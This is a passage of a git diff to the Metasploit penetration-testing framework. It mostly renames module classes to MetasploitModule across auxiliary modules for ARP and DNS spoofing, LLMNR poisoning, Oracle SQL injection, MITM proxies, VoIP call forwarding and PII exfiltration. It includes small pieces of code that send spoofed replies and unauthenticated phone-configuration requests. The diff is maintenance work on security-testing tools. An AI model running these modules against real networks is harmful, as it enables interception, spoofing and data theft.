ser_sock] end diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 18ef1934ae..0033a03077 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb index 7d8e18556b..86ec17abe3 100644 --- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb +++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/ms15_134_mcl_leak.rb b/modules/auxiliary/server/ms15_134_mcl_leak.rb index 1b97e2d2ea..896e05a6be 100644 --- a/modules/auxiliary/server/ms15_134_mcl_leak.rb +++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'cgi' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb index b30cb8c6b8..e197916a7e 100644 --- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb +++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index f316d4100d..3146aff0db 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/pxeexploit.rb b/modules/auxiliary/server/pxeexploit.rb index a2a7815f82..b635394bf1 100644 --- a/modules/auxiliary/server/pxeexploit.rb +++ b/modules/auxiliary/server/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index 1695eeb3e2..aec82408ff 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -7,7 +7,7 @@ require 'thread' require 'msf/core' require 'rex/proto/proxy/socks4a' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index 547253c0b9..5e7d1e6e57 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index 92466df2ee..491e9802d3 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'tmpdir' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/auxiliary/server/tnftp_savefile.rb index 26e4894234..2c1222705a 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/auxiliary/server/tnftp_savefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index c46d0dc197..c955636e3d 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wget_symlink_file_write.rb b/modules/auxiliary/server/wget_symlink_file_write.rb index 7c1393b655..b8e9ce41e8 100644 --- a/modules/auxiliary/server/wget_symlink_file_write.rb +++ b/modules/auxiliary/server/wget_symlink_file_write.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wpad.rb b/modules/auxiliary/server/wpad.rb index 087e30c9d5..0b99424ff1 100644 --- a/modules/auxiliary/server/wpad.rb +++ b/modules/auxiliary/server/wpad.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index d2551d6e13..8dc5e2f964 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index e60bac50ee..aacfb39fd4 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary raise RuntimeError ,'Source MAC is not in correct format' unless is_mac?(@smac) @sip = datastore['LOCALSIP'] - @sip ||= Pcap.lookupaddrs(@interface)[0] if @netifaces + @sip ||= get_ipv4_addr(@interface)[0] if @netifaces raise "LOCALSIP is not defined and can not be guessed" unless @sip raise "LOCALSIP is not an ipv4 address" unless Rex::Socket.is_ipv4?(@sip) diff --git a/modules/auxiliary/spoof/cisco/cdp.rb b/modules/auxiliary/spoof/cisco/cdp.rb index b320ad39ab..12b1118e85 100644 --- a/modules/auxiliary/spoof/cisco/cdp.rb +++ b/modules/auxiliary/spoof/cisco/cdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture def initialize diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 99635b7b88..a9ab5ea1ac 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 252269ec00..4960895c92 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index e6b76e176e..b15069e1ae 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -9,7 +9,7 @@ require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 6b881e849e..f4292229b1 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/spoof/llmnr/llmnr_response.rb b/modules/auxiliary/spoof/llmnr/llmnr_response.rb index b94cb212c8..5b604415fb 100644 --- a/modules/auxiliary/spoof/llmnr/llmnr_response.rb +++ b/modules/auxiliary/spoof/llmnr/llmnr_response.rb @@ -8,7 +8,7 @@ require 'socket' require 'ipaddr' require 'net/dns' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture @@ -44,7 +44,7 @@ attr_accessor :sock, :thread register_options([ OptAddress.new('SPOOFIP', [ true, "IP address with which to poison responses", ""]), OptRegexp.new('REGEX', [ true, "Regex applied to the LLMNR Name to determine if spoofed reply is sent", '.*']), - OptInt.new('TTL', [ false, "Time To Live for the spoofed response", 300]), + OptInt.new('TTL', [ false, "Time To Live for the spoofed response", 30]), ]) deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER') @@ -85,7 +85,7 @@ attr_accessor :sock, :thread when ::Net::DNS::A dns_pkt.answer << ::Net::DNS::RR::A.new( :name => name, - :ttl => 30, + :ttl => datastore['TTL'], :cls => ::Net::DNS::IN, :type => ::Net::DNS::A, :address => spoof.to_s @@ -93,7 +93,7 @@ attr_accessor :sock, :thread when ::Net::DNS::AAAA dns_pkt.answer << ::Net::DNS::RR::AAAA.new( :name => name, - :ttl => 30, + :ttl => datastore['TTL'], :cls => ::Net::DNS::IN, :type => ::Net::DNS::AAAA, :address => (spoof.ipv6? ? spoof : spoof.ipv4_mapped).to_s diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index 56be4ad3f2..887dfb492b 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index c2a8526b1b..74b97e94da 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 321e6274cf..9c91ad82f0 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 94a89cafaa..044e891078 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index ec27e9811d..550371ede9 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 7b91469936..ac55375e17 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb index c0022ed351..1d19d2c094 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index f4fb58a5de..1ce9b91f56 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index d7d10f96fc..f702167af9 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index d37f8afa39..3d7d30f039 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index e6a178033c..19000fa3e5 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index e26375ae12..e2e0520df4 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index e3df57ecb9..b6384a70ea 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 4ecfd3accb..a01efd8bc6 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 878c2b01d6..aa36759b4c 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 0ae6f375c2..163d335998 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 93d6a71e4b..701050daf0 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index fac34e6d92..18c8f676f8 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index d97591d2da..50afc10cc0 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/voip/asterisk_login.rb b/modules/auxiliary/voip/asterisk_login.rb index a05995214d..51022dbfd7 100644 --- a/modules/auxiliary/voip/asterisk_login.rb +++ b/modules/auxiliary/voip/asterisk_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index b3de7313ce..6f35f80783 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb +++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary uri = normalize_uri(target_uri.to_s) mac = datastore["MAC"] - print_status("#{peer} - Getting fintnumbers and display names of the IP phone") + print_status("Getting fintnumbers and display names of the IP phone") res = send_request_cgi( { @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/ - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") print_status("#{res}") return [] end @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary end lines.size.times do |i| - print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") + print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}") end fint_numbers @@ -106,13 +106,13 @@ class Metasploit3 < Msf::Auxiliary end if fint_numbers.empty? - print_error("#{peer} - FINTNUMBER required to forward calls") + print_error("FINTNUMBER required to forward calls") return end fint_numbers.each do |fintnumber| - print_status("#{peer} - Sending call forward request for #{fintnumber}") + print_status("Sending call forward request for #{fintnumber}") send_request_cgi( { @@ -138,9 +138,9 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.body && res.body && res.body.to_s =~ /CFA/ - print_good("#{peer} - Call forwarded successfully for #{fintnumber}") + print_good("Call forwarded successfully for #{fintnumber}") else - print_status("#{peer} - Call forward failed.") + print_status("Call forward failed.") end end end diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index ae40518cd1..2c7a8005c3 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/ return Exploit::CheckCode::Vulnerable, res else - print_error("#{peer} - Target appears not vulnerable!") + print_error("Target appears not vulnerable!") return Exploit::CheckCode::Safe, res end end @@ -98,17 +98,17 @@ class Metasploit3 < Msf::Auxiliary info << "Name: #{names[i].split(":")[1]}, " info << "Telephone: #{phones[i]}" - print_good("#{peer} - #{info}") + print_good("#{info}") end else - print_status("#{peer} - No Speed Dial detected") + print_status("No Speed Dial detected") end end def list mac = datastore['MAC'] - print_status("#{peer} - Getting Speed Dials of the IP phone") + print_status("Getting Speed Dials of the IP phone") vars_get = { 'device' => "SEP#{mac}" } @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", 'telno' => "#{telno}", @@ -134,11 +134,11 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body && res.body.to_s =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Auxiliary mac = datastore['MAC'] position = datastore['POSITION'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", @@ -156,9 +156,9 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") + print_good("Speed Dial #{position} is deleted successfully") else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary position = datastore['POSITION'] telno = datastore['TELNO'] - print_status("#{peer} - Deleting Speed Dial of the IP phone") + print_status("Deleting Speed Dial of the IP phone") vars_get = { 'entry' => "#{position}", @@ -178,8 +178,8 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeeddialdelete.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/ - print_good("#{peer} - Speed Dial #{position} is deleted successfully") - print_status("#{peer} - Adding Speed Dial to the IP phone") + print_good("Speed Dial #{position} is deleted successfully") + print_status("Adding Speed Dial to the IP phone") vars_get = { 'name' => "#{name}", @@ -192,14 +192,14 @@ class Metasploit3 < Msf::Auxiliary status, res = send_rcv('phonespeedialadd.cgi', vars_get) if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/ - print_good("#{peer} - Speed Dial #{position} is added successfully") + print_good("Speed Dial #{position} is added successfully") elsif res && res.body =~ /exist/ - print_error("#{peer} - Speed Dial is exist, change the position or choose modify!") + print_error("Speed Dial is exist, change the position or choose modify!") else - print_error("#{peer} - Speed Dial couldn't add!") + print_error("Speed Dial couldn't add!") end else - print_error("#{peer} - Speed Dial is not found!") + print_error("Speed Dial is not found!") end end end diff --git a/modules/auxiliary/voip/sip_deregister.rb b/modules/auxiliary/voip/sip_deregister.rb index 1369b7b231..d934835c9b 100644 --- a/modules/auxiliary/voip/sip_deregister.rb +++ b/modules/auxiliary/voip/sip_deregister.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 5ee141c27c..96468a23d9 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/telisca_ips_lock_control.rb b/modules/auxiliary/voip/telisca_ips_lock_control.rb index 3f40c00489..690fe6c93a 100644 --- a/modules/auxiliary/voip/telisca_ips_lock_control.rb +++ b/modules/auxiliary/voip/telisca_ips_lock_control.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index 6421fdb954..41769d2e7b 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index 0a91a507cb..0cd89c9c3a 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index 097746a5d4..27821cd788 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index d68bbbdea6..bd317eb561 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb +++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # # This module sends pii via an attacker smtp machine diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index 2046f60300..f65a49e748 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class 